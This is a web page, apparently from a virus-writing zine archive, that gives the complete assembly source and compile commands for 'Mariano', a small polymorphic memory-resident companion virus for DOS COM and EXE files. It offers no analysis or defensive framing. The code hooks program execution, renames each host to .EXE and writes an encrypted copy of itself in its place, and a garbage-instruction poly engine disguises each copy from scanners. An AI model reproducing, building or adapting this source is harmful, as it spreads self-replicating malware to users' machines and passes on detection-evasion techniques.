Copy Link
Add to Bookmark
Report
SLAM4.031: Mariano by Super/29a
;==============================;
; MARIANO virus ;
;==============================;
; Made by Super/29A ;
;==============================;
; This is a polymorphic resident COM & EXE companion
; Mariano's length = 147 bytes !!!
; wow!
;
; This virus is dedicated to Mariano Mariano
;
; Greetings to: 29A and all virii writers.
;
; Compile with:
; TASM /m29A mariano.asm
; TLINK /t mariano.obj
;--------------------------------------------------------------------------
.model tiny ;yep! very very tiny!!!
.code
.386 ;so as to fuck 8086 users X=D
org 100h
vir_start:
;===================================================================
call entry_point
hook:
pusha ; save regs
mov si,dx ; ds:si = ds:dx
lea dx,[bx+40h] ; ds:dx = ds:bx+40 = command.com stack
mov di,dx ; es:di = ds:bx+40
push si
copy_filename:
cmp byte ptr [si],'.' ;
movsb ; store filename
jnz copy_filename ;
mov dword ptr [di],004d4f43h ; add extension COM
mov dword ptr [si],00455845h ; add extension EXE
pop di
mov ah,56h ; rename to EXE
int 21h ;
mov ah,3ch ; create virus :=)
mov cl,1 ; (read-only attribute)
int 21h ;
xchg bx,ax ;
;------------> here starts poly engine <------------;
;
call get_delta ;
get_delta: ;
pop si ;
sub si,(offset get_delta-offset vir_start) ;
mov di,dx ;
mov bp,10bh ;
call garbage ;
and cl,ah ;
mov al,0beh ;
xor al,cl ;
stosb ;
in ax,40h ;
stosw ;
sub bp,ax ;
call garbage ;
mov ax,0b480h ;
xor ah,cl ;
stosw ;
xchg bp,ax ;
stosw ;
mov eax,0f8794600h ;
or ah,cl ;
in al,40h ;
stosd ;
mov cx,vir_length ;
decrypt: ;
movs byte ptr es:[di],cs:[si] ;
xor byte ptr [di-1],al ;
loop decrypt ;
;
;-------------> here ends poly engine <-------------;
sub di,dx ;
mov cx,di ;
mov ah,40h ; write virus :)
int 21h ;
mov ah,3eh ;
int 21h ; close file
popa ; load regs
int 21h ; execute host
iret ; return control to command.com
garbage proc
inc bp
inc bp
in ax,40h
and al,111b
or al,0b0h
stosw
jp garbage
ret
garbage endp
entry_point:
mov ax,2503h ;
pop dx ; set int3 interrupt vector
int 21h ;
les di,[di+2+0ah] ; points after a "ah=4b/int21"
dec di ;
stosb ; transform "int21" into "int03"
inc dh ;
int 27h ; stay resident
;===================================================================
vir_length equ $-offset vir_start
end vir_start
